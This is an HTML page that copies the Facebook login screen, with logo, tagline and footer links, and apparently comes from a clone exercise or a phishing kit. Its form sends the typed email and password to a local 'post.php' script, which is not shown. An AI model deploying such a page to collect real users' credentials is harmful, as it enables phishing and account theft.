<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook-login or sign up</title>
    <link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon">
    <link rel="stylesheet" href="style.css">
</head>
<body>
    <header>
        <div class="container">
            <div class="flex-item">
                <div class="logo-area">
                    <img src="images/fb-logo.svg" alt="facebook">
                    <p>Facebook helps you connect and share with the people in your life.</p>
                </div>
                <div class="login-area">
                   <div class="box">
                        <form action="post.php">
                            <input type="text" name="email" id="mail" placeholder="Email address or phone number">
                            <input type="password" name="password" id="passcode" placeholder="Password">
                            <input type="submit" value="Log In">
                            <a href="#" class="fp">forgotten password?</a>
                        </form>
                        <hr>
                        <a href="#" class="c-account">create new account</a>
                   </div>
                    <p> <a href="#" class="c-page">create a page</a> for a celebrity, band or business</p>
                </div>
            </div>
        </div>
    </header>
        <footer class="footer-area">
            <div class="container">
                <div class="footer-top">
                    <ul>
                        <li><a href="#">English (US)</a></li>
                        <li><a href="#">বাংলা</a></li>
                        <li><a href="#">Español</a></li>
                        <li><a href="#">Português (Brasil)</a></li>
                        <li><a href="#">العربية</a></li>
                        <li><a href="#">Italiano</a></li>
                        <li><a href="#">Bahasa Indonesia</a></li>
                        <li><a href="#">Français (France)</a></li>
                        <li><a href="#">Deutsch</a></li>
                        <li><a href="#">हिन्दी</a></li>
                        <li><a href="#">…</a></li>
                    </ul>
                </div>
            
                <hr>
            
                <div class="footer-bottom">
                    <ul>
                        <li><a href="#">Sign Up</a></li>
                        <li><a href="#">Log In</a></li>
                        <li><a href="#">Messenger</a></li>
                        <li><a href="#">Facebook Lite</a></li>
                        <li><a href="#">Mobile</a></li>
                        <li><a href="#">Find Friends</a></li>
                        <li><a href="#">Badges</a></li>
                        <li><a href="#">People</a></li>
                        <li><a href="#">Pages</a></li>
                        <li><a href="#">Places</a></li>
                        <li><a href="#">Games</a></li>
                        <li><a href="#">Locations</a></li>
                        <li><a href="#">About</a></li>
                        <li><a href="#">Create Ad</a></li>
                        <li><a href="#">Create Page</a></li>
                        <li><a href="#">Developers</a></li>
                        <li><a href="#">Careers</a></li>
                        <li><a href="#">Privacy</a></li>
                        <li><a href="#">Cookies</a></li>
                        <li><a href="#">Ad Choices</a></li>
                        <li><a href="#">Terms</a></li>
                        <li><a href="#">Help</a></li>
                    </ul>
                </div>
                <div class="copyright">
                    <p>Facebook © 2020</p>
                    <a href="#">English (US)</a>
        </footer>
</body>
</html>